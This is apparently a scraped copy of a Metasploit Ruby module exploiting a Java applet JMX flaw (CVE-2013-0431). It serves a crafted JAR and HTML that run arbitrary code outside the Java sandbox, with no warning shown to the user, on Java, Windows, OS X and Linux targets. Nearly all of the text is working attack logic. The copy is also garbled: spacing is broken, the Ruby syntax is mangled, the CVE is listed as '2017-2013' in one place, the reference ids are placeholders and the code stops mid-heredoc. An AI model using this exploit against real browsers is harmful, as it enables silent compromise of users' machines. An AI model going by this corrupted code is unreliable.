Java Applet JMX Remote Code Execution

### This file is part of the Metasploit Framework and may be subject to # redistribution and specified cial restrictions. please see the Metasploit # web site for more information on licensing and terms of use. # require 'msf/core' require 'recore' class Metasploit3 <msf: Exploit: Remote Rank = ExcellentRanking include Msf: Exploit: Remote: HttpServer :: HTML include Msf: Exploit: EXE include Msf: Exploit: Remote: BrowserAutopwn autopwn_info ({: javascript => false}) def initialize (info = {}) super (update_info (info, 'name' => 'java Applet JMX Remote Code Execution ', 'description' => % q {This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user .}, 'license '=> MSF_LICENSE, 'author' => ['unknown', # Vulnerability discovery and exploit in the wild 'Adam gowdiak', # Vulnerability discovery 'securityobscurity ', # Exploit analysis and deobfuscation 'juan vazquez' # Metasploit module], 'references '=> [['cve', '2017-2013'], ['ossvdb ', '123'], ['bid', '123'], ['url ',' http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf '], ['Url ',' http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf '], ['Url ',' http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html '], ['Url ',' http://pastebin.com/QWU1rqjf '], ['Url ',' http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html '], 'Platform' => ['java', 'win', 'osx', 'linux'], 'payload' => {'space' => 20480, 'badchars' => '', 'disablenops '=> true}, 'targets' => [['generic (Java Payload )', {'platform' => ['java'], 'arch '=> ARCH_JAVA,}], ['windows x86 (Native Payload )', {'platform' => 'win', 'arch '=> ARCH_X86,}], ['mac OS X x86 (Native Payload )', {'platform' => 'osx', 'arch '=> ARCH_X86,}], ['linux X86 (Native Payload) ', {'Platform' => 'linux ', 'arch' => ARCH_X86,}],], 'defaulttarget' => 0, 'disclosuredate' => 'Jan 19 2013 ') end def on_request_uri (cli, request) print_status ("handling request for # {request. uri} ") case request. uri when /\. jar $/I print_status ("Sending JAR") send_response (cli, generate_jar, {'content-type' => "application/octet-stream "}) when/\/$/print_status ("Sendin G HTML ") send_response_html (cli, generate_html, {'content-type' => 'text/html'}) else send_redirect (cli, get_resource () + '/', '') end def generate_jar paths = [[" Exploit. ser "], [" Exploit. class "], [" B. class "] p = regenerate_payload (cli) jar = p. encoded_jar paths. each do | path | 1. upto (path. length-1) do | idx | full = path [0, idx]. join ("/") + "/" if! (Jar. entries. map {| e. name}. include? (Full) jar. add_file (full, '') end fd = File. open (File. join (Msf: Config. install_root, "data", "exploits", "cve-2013-0431", path), "rb") data = fd. read (fd. stat. size) jar. add_file (path. join ("/"), data) fd. close end return jar. pack end def generate_html html = <-EOF